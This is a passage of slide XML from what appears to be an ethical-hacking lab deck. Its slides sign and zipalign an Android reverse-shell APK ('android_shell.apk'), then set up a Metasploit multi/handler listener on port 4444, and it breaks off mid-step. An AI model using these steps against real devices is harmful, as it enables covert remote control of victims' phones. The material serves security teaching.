              <a:t> jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore android_shell.apk hacked</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="4000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="7200">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1714" name="Google Shape;1714;p247"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2041351"/>
            <a:ext cx="9143999" cy="2309648"/>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24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720" name="Google Shape;1720;p248"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="951375"/>
            <a:ext cx="8726400" cy="2308200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-369569" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Terminal:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> jarsigner -verify -verbose -certs android_shell.apk</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="4000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="7200">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1721" name="Google Shape;1721;p248"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="74100" y="1640424"/>
            <a:ext cx="9143999" cy="2762299"/>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24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727" name="Google Shape;1727;p249"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="951375"/>
            <a:ext cx="8726400" cy="2308200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-381000" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Zipalign is not preinstalled in Kali Linux, so you will have to install it first.</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="4000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="7200">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1728" name="Google Shape;1728;p249"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1782250" y="2067900"/>
            <a:ext cx="3733800" cy="238125"/>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25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734" name="Google Shape;1734;p250"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="951375"/>
            <a:ext cx="8726400" cy="2308200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-381000" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Terminal:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> zipalign -v 4 android_shell.apk singed_jar.apk</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="4000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="7200">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1735" name="Google Shape;1735;p250"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1267363" y="1832513"/>
            <a:ext cx="6143625" cy="2028825"/>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p251"/>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741" name="Google Shape;1741;p251"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="951375"/>
            <a:ext cx="8726400" cy="2308200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-381000" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Now we have signed our android_shell.apk file successfully and it can be run on any Android environment. Our new filename is singed_jar.apk after the verification with Zipalign.</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="4000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="7200">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1742" name="Google Shape;1742;p251"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5272621" y="2349500"/>
            <a:ext cx="3678250" cy="2414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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264600" y="804325"/>
            <a:ext cx="86148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64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>1. To perform active and passive reconnaissance using Meltago and HTtrack mirroring tools to collect technical information from any website.</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="A64D79"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="A64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>2. Performing Automated Network Reconnaissance Using Recon-ng</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3. Collecting Information from Social Networking Sites Using Recon-ng Pushpin</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>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Google Shape;1747;p25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748" name="Google Shape;1748;p252"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="105900" y="898475"/>
            <a:ext cx="8726400" cy="2308200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-381000" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Step 2: is to set up the listener on the Kali Linux machine with multi/handler payload using Metasploit.</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-381000" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Terminal: msfconsole</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="4000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="7200">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1749" name="Google Shape;1749;p252"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4720175" y="1746250"/>
            <a:ext cx="4317925" cy="3397250"/>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Google Shape;1754;p25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755" name="Google Shape;1755;p253"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="105900" y="898475"/>
            <a:ext cx="8726400" cy="2308200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-381000" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Metasploit begins with the console.</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="4000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="7200">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1756" name="Google Shape;1756;p253"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1100675" y="1418175"/>
            <a:ext cx="6455825" cy="3054350"/>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61" name="Google Shape;1761;p254"/>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762" name="Google Shape;1762;p254"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="105900" y="898475"/>
            <a:ext cx="8726400" cy="2308200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-381000" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Now launch the exploit multi/handler and use the Android payload to listen to the clients.</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-381000" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Terminal: use exploit/multi/handler</a:t>
            </a:r>
            <a:endParaRPr sz="7200">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1763" name="Google Shape;1763;p254"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="618050" y="2211925"/>
            <a:ext cx="6597301" cy="2482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255"/>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769" name="Google Shape;1769;p255"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="105900" y="898475"/>
            <a:ext cx="8726400" cy="2308200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-355600" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Next, set the options for payload, listener IP (LHOST) and listener PORT(LPORT). We have used localhost IP, port number 4444 and payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
